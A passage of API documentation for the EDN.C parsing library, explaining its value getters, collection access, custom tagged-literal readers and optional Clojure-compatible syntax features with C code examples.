}
edn_free(r.value);
bool edn_bool_get(const edn_value_t *value, bool *out);

Get boolean value. Returns true if value is EDN_TYPE_BOOL , false otherwise.

Example:

edn_result_t r = edn_read("true", 0);
bool val;
if (edn_bool_get(r.value, &val)) {
    printf("Boolean: %s\n", val ? "true" : "false");
}
edn_free(r.value);

Integers

bool edn_int64_get(const edn_value_t *value, int64_t *out);

Get int64_t value. Returns true if value is EDN_TYPE_INT , false otherwise.

Example:

edn_result_t r = edn_read("42", 0);
int64_t num;
if (edn_int64_get(r.value, &num)) {
    printf("Number: %lld\n", (long long)num);
}
edn_free(r.value);

Big Integers

const char *edn_bigint_get(const edn_value_t *value, size_t *length,
                           bool *negative, uint8_t *radix);

Get big integer digit string for use with external libraries (GMP, OpenSSL BIGNUM, etc.).

Parameters:

  • value : EDN big integer value
  • length : Output for digit string length (may be NULL)
  • negative : Output for sign flag (may be NULL)
  • radix : Output for number base: 10, 16, 8, or 2 (may be NULL)

Returns: Digit string, or NULL if not a big integer.

Clojure Compatibility: The N suffix forces BigInt for base-10 integers.

  • 42N → BigInt "42" (forced BigInt even though it fits in int64)
  • 999999999999999999999999999 → BigInt (overflow detection)
  • 0xDEADBEEFN → Long (N is hex digit, not suffix)

Example:

// BigInt from overflow
edn_result_t r = edn_read("999999999999999999999999999", 0);
size_t len;
bool neg;
uint8_t radix;
const char *digits = edn_bigint_get(r.value, &len, &neg, &radix);
if (digits) {
    printf("%s%.*s (base %d)\n", neg ? "-" : "", (int)len, digits, radix);
}
edn_free(r.value);

// BigInt with N suffix
edn_result_t r2 = edn_read("42N", 0);
digits = edn_bigint_get(r2.value, &len, &neg, &radix);
// digits = "42", len = 2, use with GMP: mpz_set_str(bigint, digits, radix)
edn_free(r2.value);

Floating Point

bool edn_double_get(const edn_value_t *value, double *out);

Get double value. Returns true if value is EDN_TYPE_FLOAT , false otherwise.

bool edn_number_as_double(const edn_value_t *value, double *out);

Convert any numeric type (INT, BIGINT, FLOAT, BIGDEC) to double. May lose precision for large numbers.

Example:

edn_result_t r = edn_read("3.14159", 0);
double num;
if (edn_double_get(r.value, &num)) {
    printf("Pi: %.5f\n", num);
}
edn_free(r.value);

Big Decimals

const char *edn_bigdec_get(const edn_value_t *value, size_t *length, bool *negative);

Get big decimal string for use with external libraries (Java BigDecimal, Python Decimal, etc.).

Parameters:

  • value : EDN big decimal value
  • length : Output for string length (may be NULL)
  • negative : Output for sign flag (may be NULL)

Returns: Decimal string, or NULL if not a big decimal.

Clojure Compatibility: The M suffix forces exact precision decimal representation.

  • 42M → BigDecimal "42" (integer with M suffix)
  • 3.14M → BigDecimal "3.14"
  • 1.5e10M → BigDecimal "1.5e10"

Example:

// BigDecimal from float
edn_result_t r1 = edn_read("3.14159265358979323846M", 0);
size_t len;
bool neg;
const char *decimal = edn_bigdec_get(r1.value, &len, &neg);
if (decimal) {
    printf("%s%.*s\n", neg ? "-" : "", (int)len, decimal);
    // Use with: Java BigDecimal(decimal), Python Decimal(decimal), etc.
}
edn_free(r1.value);

// BigDecimal from integer with M suffix
edn_result_t r2 = edn_read("42M", 0);
decimal = edn_bigdec_get(r2.value, &len, &neg);
// decimal = "42", application can convert to BigDecimal
edn_free(r2.value);

Ratio Numbers

bool edn_ratio_get(const edn_value_t *value, int64_t *numerator, int64_t *denominator);

Get ratio numerator and denominator. Returns true if value is EDN_TYPE_RATIO , false otherwise.

Parameters:

  • value : EDN ratio value
  • numerator : Output for numerator (may be NULL)
  • denominator : Output for denominator (may be NULL)

Returns: true if value is a ratio, false otherwise.

Clojure Compatibility: Ratios represent exact rational numbers as numerator/denominator pairs.

  • 22/7 → Ratio with numerator=22, denominator=7
  • -3/4 → Ratio with numerator=-3, denominator=4 (negative numerator)
  • 1/2 → Ratio with numerator=1, denominator=2
  • 3/6 → Automatically reduced to ratio 1/2
  • 10/5 → Automatically reduced to integer 2 (ratios with denominator 1 become integers)
  • 0/5 → Returns integer 0 (zero numerator always becomes integer 0)
  • 0777/3 → Returns 777/2
  • 0777/0777 → Returns 1

Automatic Reduction: Ratios are automatically reduced to lowest terms using the Binary GCD algorithm (Stein's algorithm):

  • 6/9 → Reduced to 2/3
  • 100/25 → Reduced to 4/1 → Returns as integer 4

Restrictions:

  • Only decimal (base-10) integers supported for both numerator and denominator
  • Octal (base-8) integers supported keeping compatibility with Clojure where it is incorrectly interpreted as decimal integers with leading zeros.
  • Both numerator and denominator must fit in int64_t
  • Denominator must be positive (negative denominators are rejected)
  • Denominator cannot be zero
  • No whitespace allowed around /
  • Hex and binary notations not supported for ratios

Example:

// Parse ratio
edn_result_t r = edn_read("22/7", 0);

if (r.error == EDN_OK && edn_type(r.value) == EDN_TYPE_RATIO) {
    int64_t num, den;
    edn_ratio_get(r.value, &num, &den);
    printf("Ratio: %lld/%lld\n", (long long)num, (long long)den);
    // Output: Ratio: 22/7

    // Convert to double for approximation
    double approx;
    edn_number_as_double(r.value, &approx);
    printf("Approximation: %.10f\n", approx);
    // Output: Approximation: 3.1428571429
}

edn_free(r.value);

// Automatic reduction
edn_result_t r2 = edn_read("3/6", 0);
int64_t num2, den2;
edn_ratio_get(r2.value, &num2, &den2);
// num2 = 1, den2 = 2 (reduced from 3/6)
edn_free(r2.value);

// Reduction to integer
edn_result_t r3 = edn_read("10/5", 0);
assert(edn_type(r3.value) == EDN_TYPE_INT);
int64_t int_val;
edn_int64_get(r3.value, &int_val);
// int_val = 2 (10/5 reduced to 2/1, returned as integer)
edn_free(r3.value);

// Negative ratios
edn_result_t r4 = edn_read("-3/4", 0);
int64_t num4, den4;
edn_ratio_get(r4.value, &num4, &den4);
// num4 = -3, den4 = 4 (numerator is negative, denominator is positive)
edn_free(r4.value);

// Error: zero denominator
edn_result_t r5 = edn_read("5/0", 0);
// r5.error == EDN_ERROR_INVALID_NUMBER
// r5.error_message == "Ratio denominator cannot be zero"

// Error: negative denominator (denominators must be positive)
edn_result_t r6 = edn_read("3/-4", 0);
// r6.error == EDN_ERROR_INVALID_NUMBER
// r6.error_message == "Ratio denominator must be positive"

// Error: hex not supported
edn_result_t r7 = edn_read("0x10/2", 0);
// Parses 0x10 as int, not as ratio

Build Configuration:

This feature is disabled by default. To enable it:

Make:

CMake:

cmake -DEDN_ENABLE_RATIO=ON ..
make

When disabled (default):

  • EDN_TYPE_RATIO enum value is not available
  • edn_ratio_get() function is not available

Note: Ratios are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's clojure.edn parser.

See test/test_numbers.c for comprehensive ratio test examples.

Extended Integer Formats

EDN.C supports Clojure-style special integer formats for hexadecimal, octal, binary, and arbitrary radix numbers. These are disabled by default as they are not part of the base EDN specification.

Supported formats:

  • Hexadecimal : 0xFF , 0x2A , -0x10 (base-16, prefix 0x or 0X )
  • Octal : 0777 , 052 , -0123 (base-8, leading zero followed by 0-7 )
  • Binary : 2r1010 , -2r1111 (base-2, radix notation)
  • Arbitrary radix : 8r77 , 16rFF , 36rZZ (bases 2-36, radix notation NrDDDD )

Examples:

// Hexadecimal
edn_result_t r1 = edn_read("0xFF", 0);
int64_t val1;
edn_int64_get(r1.value, &val1);
// val1 = 255
edn_free(r1.value);

// Octal
edn_result_t r2 = edn_read("0777", 0);
int64_t val2;
edn_int64_get(r2.value, &val2);
// val2 = 511 (7*64 + 7*8 + 7)
edn_free(r2.value);

// Binary (radix notation)
edn_result_t r3 = edn_read("2r1010", 0);
int64_t val3;
edn_int64_get(r3.value, &val3);
// val3 = 10
edn_free(r3.value);

// Base-36 (radix notation)
edn_result_t r4 = edn_read("36rZZ", 0);
int64_t val4;
edn_int64_get(r4.value, &val4);
// val4 = 1295 (35*36 + 35)
edn_free(r4.value);

// Negative hex
edn_result_t r5 = edn_read("-0x10", 0);
int64_t val5;
edn_int64_get(r5.value, &val5);
// val5 = -16
edn_free(r5.value);

Radix notation: NrDDDD where:

  • N is the radix (base) from 2 to 36
  • r is the radix separator
  • DDDD are the digits (0-9, A-Z, case-insensitive for bases > 10)

Build Configuration:

This feature is disabled by default. To enable it:

Make:

CMake:

cmake -DEDN_ENABLE_EXTENDED_INTEGERS=ON ..
make

When disabled (default):

  • Hexadecimal ( 0xFF ), binary ( 2r1010 ), and radix notation ( 36rZZ ) will fail to parse
  • Leading zeros are forbidden : Numbers like 01 , 0123 , 0777 are rejected (per EDN spec)
  • Only 0 itself, or 0.5 , 0e10 (floats starting with zero) are allowed

Note: Extended integer formats are a Clojure language feature, not part of the official EDN specification. They're provided here for compatibility with Clojure's reader.

See test/test_numbers.c for comprehensive extended integer format test examples.

Underscore in Numeric Literals

EDN.C supports underscores as visual separators in numeric literals for improved readability. This feature is disabled by default as it's not part of the base EDN specification.

Supported number types:

  • Integers : 1_000 , 1_000_000 , 4____2 1000 , 1000000 , 42
  • Floats : 3.14_15_92 , 1_234.56_78 3.141592 , 1234.5678
  • Scientific notation : 1_500e10 , 1.5e1_0 , 1_5.2_5e1_0 1500e10 , 1.5e10 , 15.25e10
  • BigInt : 1_234_567_890_123_456_789N
  • BigDecimal : 1_234.56_78M , 1_5.2_5e1_0M
  • Hexadecimal (with EXTENDED_INTEGERS=1 ): 0xDE_AD_BE_EF 0xDEADBEEF
  • Octal (with EXTENDED_INTEGERS=1 ): 07_77 0777
  • Binary (with EXTENDED_INTEGERS=1 ): 2r1010_1010 170
  • Radix notation (with EXTENDED_INTEGERS=1 ): 36rZ_Z 1295

Rules:

  • Underscores are only allowed between digits (not at start, end, or adjacent to special characters)
  • Multiple consecutive underscores are allowed: 4____2 is valid
  • Not allowed adjacent to decimal point: 123_.5 or 123._5 are invalid
  • Not allowed before/after exponent marker: 123_e10 or 123e_10 are invalid
  • Not allowed before suffix: 123_N or 123.45_M are invalid
  • Works with negative numbers: -1_234 -1234

Examples:

// Credit card number formatting
edn_result_t r1 = edn_read("1234_5678_9012_3456", 0);
int64_t val1;
edn_int64_get(r1.value, &val1);
// val1 = 1234567890123456
edn_free(r1.value);

// Pi with digit grouping
edn_result_t r2 = edn_read("3.14_15_92_65_35_89_79", 0);
double val2;
edn_double_get(r2.value, &val2);
// val2 = 3.141592653589793
edn_free(r2.value);

// Hex bytes (requires EXTENDED_INTEGERS=1)
edn_result_t r3 = edn_read("0xFF_EC_DE_5E", 0);
int64_t val3;
edn_int64_get(r3.value, &val3);
// val3 = 0xFFECDE5E
edn_free(r3.value);

// Large numbers with thousands separators
edn_result_t r4 = edn_read("1_000_000", 0);
int64_t val4;
edn_int64_get(r4.value, &val4);
// val4 = 1000000
edn_free(r4.value);

// In collections
edn_result_t r5 = edn_read("[1_000 2_000 3_000]", 0);
// Three integers: 1000, 2000, 3000
edn_free(r5.value);

Invalid examples:

// Underscore at start - parses as symbol
edn_read("_123", 0);  // Symbol, not number

// Underscore at end
edn_read("123_", 0);  // Error: EDN_ERROR_INVALID_NUMBER

// Adjacent to decimal point
edn_read("123_.5", 0);   // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123._5", 0);   // Error: EDN_ERROR_INVALID_NUMBER

// Before/after exponent marker
edn_read("123_e10", 0);  // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123e_10", 0);  // Error: EDN_ERROR_INVALID_NUMBER

// Before suffix
edn_read("123_N", 0);    // Error: EDN_ERROR_INVALID_NUMBER
edn_read("123.45_M", 0); // Error: EDN_ERROR_INVALID_NUMBER

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make UNDERSCORE_IN_NUMERIC=1

CMake:

cmake -DEDN_ENABLE_UNDERSCORE_IN_NUMERIC=ON ..
make

Combined with other features:

# Enable underscores with extended integers and ratios
make UNDERSCORE_IN_NUMERIC=1 EXTENDED_INTEGERS=1 RATIO=1

When disabled (default):

  • Numbers with underscores will fail to parse
  • The scanner will stop at the first underscore, treating it as an invalid number

Note: Underscores in numeric literals are a common feature in modern programming languages (Java, Rust, Python 3.6+, etc.) but are not part of the official EDN specification. This feature is provided for convenience and readability.

See test/test_underscore_numeric.c for comprehensive test examples.

Characters

bool edn_character_get(const edn_value_t *value, uint32_t *out);

Get Unicode codepoint. Returns true if value is EDN_TYPE_CHARACTER , false otherwise.

Example:

// Named characters: \newline, \tab, \space, \return
edn_result_t r1 = edn_read("\\newline", 0);
uint32_t cp1;
edn_character_get(r1.value, &cp1);  // cp1 = 0x0A

// Unicode: \uXXXX or literal character
edn_result_t r2 = edn_read("\\u03B1", 0);  // Greek alpha
uint32_t cp2;
edn_character_get(r2.value, &cp2);  // cp2 = 0x03B1

edn_free(r1.value);
edn_free(r2.value);

Type Predicates

Convenience functions for type checking:

bool edn_is_nil(const edn_value_t *value);
bool edn_is_string(const edn_value_t *value);
bool edn_is_number(const edn_value_t *value);
bool edn_is_integer(const edn_value_t *value);
bool edn_is_collection(const edn_value_t *value);

Type predicate details:

  • edn_is_nil() - Returns true for EDN_TYPE_NIL
  • edn_is_string() - Returns true for EDN_TYPE_STRING
  • edn_is_number() - Returns true for any numeric type (INT, BIGINT, FLOAT, BIGDEC, RATIO)
  • edn_is_integer() - Returns true for integer types (INT, BIGINT)
  • edn_is_collection() - Returns true for collections (LIST, VECTOR, MAP, SET)

Example:

edn_result_t r = edn_read("[42 \"hello\" [1 2] {:a 1}]", 0);

if (edn_is_collection(r.value)) {
    for (size_t i = 0; i < edn_vector_count(r.value); i++) {
        edn_value_t* elem = edn_vector_get(r.value, i);

        if (edn_is_number(elem)) {
            printf("Found number\n");
        } else if (edn_is_string(elem)) {
            printf("Found string\n");
        } else if (edn_is_collection(elem)) {
            printf("Found nested collection\n");
        }
    }
}

edn_free(r.value);

String Utilities

bool edn_string_equals(const edn_value_t *value, const char *str);

Compare EDN string with C string for equality. Returns true if equal, false otherwise.

Example:

edn_result_t r = edn_read("{:status \"active\"}", 0);
edn_value_t* status = edn_map_get_keyword(r.value, "status");

if (edn_string_equals(status, "active")) {
    printf("Status is active\n");
}

edn_free(r.value);

Symbols

bool edn_symbol_get(const edn_value_t *value,
                    const char **namespace, size_t *ns_length,
                    const char **name, size_t *name_length);

Get symbol components. Returns true if value is EDN_TYPE_SYMBOL , false otherwise.

Example:

// Simple symbol
edn_result_t r1 = edn_read("foo", 0);
const char *name;
size_t name_len;
edn_symbol_get(r1.value, NULL, NULL, &name, &name_len);
printf("Symbol: %.*s\n", (int)name_len, name);

// Namespaced symbol
edn_result_t r2 = edn_read("clojure.core/map", 0);
const char *ns, *n;
size_t ns_len, n_len;
edn_symbol_get(r2.value, &ns, &ns_len, &n, &n_len);
printf("Symbol: %.*s/%.*s\n", (int)ns_len, ns, (int)n_len, n);

edn_free(r1.value);
edn_free(r2.value);

Keywords

bool edn_keyword_get(const edn_value_t *value,
                     const char **namespace, size_t *ns_length,
                     const char **name, size_t *name_length);

Get keyword components. Returns true if value is EDN_TYPE_KEYWORD , false otherwise.

Example:

edn_result_t r = edn_read(":name", 0);
const char *name;
size_t name_len;
edn_keyword_get(r.value, NULL, NULL, &name, &name_len);
printf("Keyword: :%.*s\n", (int)name_len, name);
edn_free(r.value);

Collections

Lists

Ordered sequences: (1 2 3)

size_t edn_list_count(const edn_value_t *value);
edn_value_t *edn_list_get(const edn_value_t *value, size_t index);

Example:

edn_result_t r = edn_read("(1 2 3)", 0);
size_t count = edn_list_count(r.value);

for (size_t i = 0; i < count; i++) {
    edn_value_t *elem = edn_list_get(r.value, i);
    int64_t num;
    if (edn_int64_get(elem, &num)) {
        printf("%lld ", (long long)num);
    }
}
printf("\n");
edn_free(r.value);

Vectors

Indexed sequences: [1 2 3]

size_t edn_vector_count(const edn_value_t *value);
edn_value_t *edn_vector_get(const edn_value_t *value, size_t index);

Example:

edn_result_t r = edn_read("[\"a\" \"b\" \"c\"]", 0);
size_t count = edn_vector_count(r.value);

for (size_t i = 0; i < count; i++) {
    edn_value_t *elem = edn_vector_get(r.value, i);
    size_t len;
    const char *str = edn_string_get(elem, &len);
    printf("[%zu] = %.*s\n", i, (int)len, str);
}
edn_free(r.value);

Sets

Unique elements: #{:a :b :c}

size_t edn_set_count(const edn_value_t *value);
edn_value_t *edn_set_get(const edn_value_t *value, size_t index);
bool edn_set_contains(const edn_value_t *value, const edn_value_t *element);

Note: Sets reject duplicate elements during parsing. Iteration order is implementation-defined.

Example:

edn_result_t r = edn_read("#{:a :b :c}", 0);
printf("Set has %zu elements\n", edn_set_count(r.value));

edn_result_t key = edn_read(":a", 0);
if (edn_set_contains(r.value, key.value)) {
    printf(":a is in set\n");
}

edn_free(key.value);
edn_free(r.value);

Maps

Key-value pairs: {:foo 1 :bar 2}

size_t edn_map_count(const edn_value_t *value);
edn_value_t *edn_map_get_key(const edn_value_t *value, size_t index);
edn_value_t *edn_map_get_value(const edn_value_t *value, size_t index);
edn_value_t *edn_map_lookup(const edn_value_t *value, const edn_value_t *key);
bool edn_map_contains_key(const edn_value_t *value, const edn_value_t *key);

Note: Maps reject duplicate keys during parsing. Iteration order is implementation-defined.

Example:

edn_result_t r = edn_read("{:name \"Alice\" :age 30}", 0);

// Iterate over all entries
size_t count = edn_map_count(r.value);
for (size_t i = 0; i < count; i++) {
    edn_value_t *key = edn_map_get_key(r.value, i);
    edn_value_t *val = edn_map_get_value(r.value, i);
    
    const char *key_name;
    size_t key_len;
    edn_keyword_get(key, NULL, NULL, &key_name, &key_len);
    printf(":%.*s => ", (int)key_len, key_name);
    
    if (edn_type(val) == EDN_TYPE_STRING) {
        size_t val_len;
        const char *str = edn_string_get(val, &val_len);
        printf("\"%.*s\"\n", (int)val_len, str);
    } else if (edn_type(val) == EDN_TYPE_INT) {
        int64_t num;
        edn_int64_get(val, &num);
        printf("%lld\n", (long long)num);
    }
}

// Lookup by key
edn_result_t key = edn_read(":name", 0);
edn_value_t *name = edn_map_lookup(r.value, key.value);
if (name != NULL) {
    size_t len;
    const char *str = edn_string_get(name, &len);
    printf("Name: %.*s\n", (int)len, str);
}

edn_free(key.value);
edn_free(r.value);

Map Convenience Functions:

edn_value_t *edn_map_get_keyword(const edn_value_t *map, const char *keyword);
edn_value_t *edn_map_get_namespaced_keyword(const edn_value_t *map, const char *namespace, const char *name);
edn_value_t *edn_map_get_string_key(const edn_value_t *map, const char *key);

Convenience wrappers that simplify common map lookup patterns by creating the key internally.

Example:

edn_result_t r = edn_read("{:name \"Alice\" :family/name \"Black\" :age 30 \"config\" true}", 0);

// Keyword lookup
edn_value_t* name = edn_map_get_keyword(r.value, "name");
if (name && edn_is_string(name)) {
    // name is "Alice"
}

edn_value_t* name = edn_map_get_namespaced_keyword(r.value, "family", "name");
if (name && edn_is_string(name)) {
    // name is "Black"
}

// String key lookup
edn_value_t* config = edn_map_get_string_key(r.value, "config");
if (config) {
    bool val;
    edn_bool_get(config, &val);  // val is true
}

edn_free(r.value);

Tagged Literals

Tagged literals provide extensibility: #tag value

Basic Tagged Literal Access

bool edn_tagged_get(const edn_value_t *value,
                    const char **tag, size_t *tag_length,
                    edn_value_t **tagged_value);

Example:

edn_result_t r = edn_read("#inst \"2024-01-01T00:00:00Z\"", 0);

const char *tag;
size_t tag_len;
edn_value_t *wrapped;

if (edn_tagged_get(r.value, &tag, &tag_len, &wrapped)) {
    printf("Tag: %.*s\n", (int)tag_len, tag);
    
    size_t str_len;
    const char *str = edn_string_get(wrapped, &str_len);
    printf("Value: %.*s\n", (int)str_len, str);
}

edn_free(r.value);

Custom Readers

Transform tagged literals during parsing with custom reader functions.

Reader Registry Functions

// Create and destroy registry
edn_reader_registry_t *edn_reader_registry_create(void);
void edn_reader_registry_destroy(edn_reader_registry_t *registry);

// Register/unregister readers
bool edn_reader_register(edn_reader_registry_t *registry,
                         const char *tag, edn_reader_fn reader);
void edn_reader_unregister(edn_reader_registry_t *registry, const char *tag);
edn_reader_fn edn_reader_lookup(const edn_reader_registry_t *registry,
                                const char *tag);

Reader Function Type

typedef edn_value_t *(*edn_reader_fn)(edn_value_t *value,
                                      edn_arena_t *arena,
                                      const char **error_message);

A reader function receives the wrapped value and transforms it into a new representation. On error, set error_message to a static string and return NULL.

Parse Options

typedef struct {
    edn_reader_registry_t *reader_registry;  // Optional reader registry
    edn_value_t *eof_value;                  // Optional value to return on EOF
    edn_default_reader_mode_t default_reader_mode;
} edn_parse_options_t;

edn_result_t edn_read_with_options(const char *input, size_t length,
                                    const edn_parse_options_t *options);

Parse options fields:

  • reader_registry : Optional reader registry for tagged literal transformations
  • eof_value : Optional value to return when EOF is encountered instead of an error
  • default_reader_mode : Behavior for unregistered tags (see below)

Default reader modes:

  • EDN_DEFAULT_READER_PASSTHROUGH : Return EDN_TYPE_TAGGED for unregistered tags (default)
  • EDN_DEFAULT_READER_UNWRAP : Discard tag, return wrapped value
  • EDN_DEFAULT_READER_ERROR : Fail with EDN_ERROR_UNKNOWN_TAG

EOF Value Handling:

By default, when the parser encounters end-of-file (empty input, whitespace-only input, or after #_ discard), it returns EDN_ERROR_UNEXPECTED_EOF . You can customize this behavior by providing an eof_value in the parse options:

// First, create an EOF sentinel value
edn_result_t eof_sentinel = edn_read(":eof", 0);

// Configure parse options with EOF value
edn_parse_options_t options = {
    .reader_registry = NULL,
    .eof_value = eof_sentinel.value,
    .default_reader_mode = EDN_DEFAULT_READER_PASSTHROUGH
};

// Parse input that results in EOF
edn_result_t result = edn_read_with_options("   ", 3, &options);

// Instead of EDN_ERROR_UNEXPECTED_EOF, returns EDN_OK with eof_value
if (result.error == EDN_OK) {
    // result.value == eof_sentinel.value
    const char* name;
    edn_keyword_get(result.value, NULL, NULL, &name, NULL);
    // name == "eof"
}

// Clean up
edn_free(eof_sentinel.value);

Reader Example

#include "edn.h"
#include "../src/edn_internal.h"  // For edn_arena_alloc

// Reader that uppercases keywords
static edn_value_t *upper_reader(edn_value_t *value, edn_arena_t *arena,
                                 const char **error_message) {
    if (edn_type(value) != EDN_TYPE_KEYWORD) {
        *error_message = "#upper requires keyword";
        return NULL;
    }

    const char *name;
    size_t name_len;
    edn_keyword_get(value, NULL, NULL, &name, &name_len);

    // Allocate uppercase name in arena
    char *upper = (char *)edn_arena_alloc(arena, name_len + 1);
    if (!upper) {
        *error_message = "Out of memory";
        return NULL;
    }

    for (size_t i = 0; i < name_len; i++) {
        char c = name[i];
        upper[i] = (c >= 'a' && c <= 'z') ? (c - 32) : c;
    }
    upper[name_len] = '\0';

    // Create new keyword value
    edn_value_t *result = edn_arena_alloc_value(arena);
    if (!result) {
        *error_message = "Out of memory";
        return NULL;
    }

    result->type = EDN_TYPE_KEYWORD;
    result->as.keyword.name = upper;
    result->as.keyword.name_length = name_len;
    result->as.keyword.namespace = NULL;
    result->as.keyword.ns_length = 0;
    result->arena = arena;

    return result;
}

int main(void) {
    // Create registry and register reader
    edn_reader_registry_t *registry = edn_reader_registry_create();
    edn_reader_register(registry, "upper", upper_reader);

    // Parse with custom reader
    edn_parse_options_t opts = {
        .reader_registry = registry,
        .default_reader_mode = EDN_DEFAULT_READER_PASSTHROUGH
    };

    edn_result_t r = edn_read_with_options("#upper :hello", 0, &opts);
    if (r.error == EDN_OK) {
        const char *name;
        size_t len;
        edn_keyword_get(r.value, NULL, NULL, &name, &len);
        printf(":%.*s\n", (int)len, name);  // Output: :HELLO
    }

    edn_free(r.value);
    edn_reader_registry_destroy(registry);
    return 0;
}

See examples/reader.c for more complete examples including timestamp conversion, vector extraction, and namespaced tags.

Map Namespace Syntax

EDN.C supports Clojure's map namespace syntax extension, which allows you to specify a namespace that gets automatically applied to all non-namespaced keyword keys in a map.

Syntax: #:namespace{:key1 val1 :key2 val2}

Example:

edn_result_t result = edn_read("#:person{:name \"Alice\" :age 30}", 0);
// Equivalent to: {:person/name "Alice" :person/age 30}

if (result.error == EDN_OK) {
    edn_value_t* map = result.value;
    
    // Keys are automatically namespaced
    edn_value_t* key1 = edn_map_get_key(map, 0);
    const char *ns, *name;
    size_t ns_len, name_len;
    edn_keyword_get(key1, &ns, &ns_len, &name, &name_len);
    
    printf(":%.*s/%.*s\n", (int)ns_len, ns, (int)name_len, name);
    // Output: :person/name
    
    edn_free(map);
}

Rules:

  • Both keyword and symbol keys without an existing namespace are transformed
  • Keys with existing namespaces are preserved: #:foo{:x 1 :bar/y 2} {:foo/x 1 :bar/y 2}
  • Symbol keys are also namespaced: #:foo{x 1 y 2} {foo/x 1 foo/y 2}
  • Mixed keys work correctly: #:foo{x 1 :y 2} {foo/x 1 :foo/y 2}
  • Non-keyword/non-symbol keys are not transformed: #:foo{"x" 1 :y 2} {"x" 1 :foo/y 2}
  • The namespace keyword cannot itself have a namespace

Build Configuration:

This feature is disabled by default. To enable it:

make MAP_NAMESPACE_SYNTAX=1

When disabled (default), #:foo{...} will fail to parse.

See examples/example_namespaced_map.c for more details.

Extended Character Literals

EDN.C supports optional extended character literal features that are disabled by default for strict EDN compliance.

Extended named characters:

  • \formfeed - Form feed control character (U+000C)
  • \backspace - Backspace control character (U+0008)

Octal escape sequences (Clojure-compatible):

  • \oN - Where N is 1-3 octal digits (0-7)
  • If \o is followed by any digit, attempts octal parsing
  • Digits 8 or 9 cause "Invalid octal escape sequence in character literal" error
  • Examples:
    • \o7 - Bell character (U+0007)
    • \o12 - Line feed (U+000A)
    • \o101 - Uppercase 'A' (U+0041)
    • \o377 - Maximum value (U+00FF / 255)
    • \o alone - Parses as character 'o'
    • \o8 - Error: Invalid octal character

Example:

edn_result_t result = edn_read("\\formfeed", 0);
if (result.error == EDN_OK) {
    uint32_t codepoint;
    edn_character_get(result.value, &codepoint);
    printf("U+%04X\n", codepoint);  // Output: U+000C
    edn_free(result.value);
}

// Octal escapes
result = edn_read("[\\o101 \\o102 \\o103]", 0);
// Parses as vector ['A', 'B', 'C']

Build Configuration:

This feature is disabled by default. To enable it:

Make:

make EXTENDED_CHARACTERS=1

CMake:

cmake -DEDN_ENABLE_EXTENDED_CHARACTERS=ON ..
make

When disabled (default):

  • \formfeed and \backspace will fail to parse
  • \oNNN will fail to parse
  • Standard character literals still work: \newline , \tab , \space , \return , \uXXXX , etc.

See examples/example_extended_characters.c for more details.

Metadata

EDN.C supports Clojure-style metadata syntax, which allows attaching metadata maps to values.

Syntax variants:

  1. Map metadata : ^{:key val} form - metadata is the map itself
  2. Keyword shorthand : ^:keyword form - expands to {:keyword true}
  3. String tag : ^"string" form - expands to {:tag "string"}
  4. Symbol tag : ^symbol form - expands to {:tag symbol}
  5. Vector param-tags : ^[type1 type2] form - expands to {:param-tags [type1 type2]}

Chaining : Multiple metadata can be chained: ^meta1 ^meta2 form - metadata maps are merged from right to left.

Example:

#include "edn.h"
#include <stdio.h>

int main(void) {
    // Parse with keyword shorthand
    edn_result_t result = edn_read("^:private my-var", 0);

    if (result.error == EDN_OK) {
        // Check if value has metadata
        if (edn_value_has_meta(result.value)) {
            edn_value_t* meta = edn_value_meta(result.value);

            // Metadata is always a map
            printf("Metadata entries: %zu\n", edn_map_count(meta));

            // Look up specific metadata key
            edn_result_t key = edn_read(":private", 0);
            edn_value_t* val = edn_map_lookup(meta, key.value);
            // val will be boolean true

            edn_free(key.value);
        }

        edn_free(result.value);
    }

    return 0;
}

More examples:

// Map metadata
edn_read("^{:doc \"A function\" :test true} my-fn", 0);

// String tag
edn_read("^\"String\" [1 2 3]", 0);
// Expands to: ^{:tag "String"} [1 2 3]

// Symbol tag
edn_read("^Vector [1 2 3]", 0);
// Expands to: ^{:tag Vector} [1 2 3]

// Vector param-tags
edn_read("^[String long _] my-fn", 0);
// Expands to: ^{:param-tags [String long _]} my-fn

// Chained metadata
edn_read("^:private ^:dynamic ^{:doc \"My var\"} x", 0);
// All metadata merged into one map

Supported value types:

Metadata can only be attached to:

  • Collections: lists, vectors, maps, sets
  • Tagged literals
  • Symbols

Note: Metadata cannot be attached to scalar values (nil, booleans, numbers, strings, keywords).

API:

// Check if value has metadata
bool edn_value_has_meta(const edn_value_t* value);

// Get metadata map (returns NULL if no metadata)
edn_value_t* edn_value_meta(const edn_value_t* value);

Build Configuration:

This feature is disabled by default. To enable it:

Make:

CMake:

cmake -DEDN_ENABLE_METADATA=ON ..
make

When disabled (default):

  • ^ is treated as a valid character in identifiers (symbols/keywords)
  • ^test parses as a symbol named "^test"
  • Metadata API functions are not available

Note: Metadata is a Clojure language feature, not part of the official EDN specification. It's provided here for compatibility with Clojure's reader.

See examples/example_metadata.c for more details.

Text Blocks

Experimental feature that adds Java-style multi-line text blocks with automatic indentation stripping to EDN. Requires EDN_ENABLE_TEXT_BLOCKS compilation flag (disabled by default).

Text blocks start with three double quotes followed by a newline ( """\n ) and end with three double quotes ( """ ):

{:query """
    SELECT *
      FROM users
    WHERE age > 21
    """}

Features:

  • Automatic indentation stripping (common leading whitespace removed)
  • Closing """ position determines base indentation level
  • Closing on own line adds trailing newline, on same line doesn't
  • Trailing whitespace automatically removed from each line
  • Minimal escaping: only \""" to include literal triple quotes
  • Returns standard EDN string (no special type needed)

Example:

#include "edn.h"
#include <stdio.h>

int main(void) {
    const char* input =
        "{:sql \"\"\"\n"
        "       SELECT * FROM users\n"
        "       WHERE age > 21\n"
        "       ORDER BY name\n"
        "       \"\"\""}";

    edn_result_t result = edn_read(input, 0);

    if (result.error == EDN_OK) {
        edn_result_t key = edn_read(":sql", 0);
        edn_value_t* val = edn_map_lookup(result.value, key.value);

        // Text block returns a regular string with indentation stripped
        size_t len;
        const char* sql = edn_string_get(val, &len);
        printf("%s\n", sql);
        // Output:
        // SELECT * FROM users
        // WHERE age > 21
        // ORDER BY name

        edn_free(key.value);
        edn_free(result.value);
    }

    return 0;
}

Indentation Rules (Java JEP 378) :

  1. Find minimum indentation across all non-blank lines
  2. Closing """ position also determines indentation
  3. Strip that amount from each line
  4. If closing """ is on its own line, add trailing \n
{:foo """
        line1
       line2
      line3
      """}

Result: {:foo " line1\n line2\nline3\n"} (min indent 6, trailing newline added)
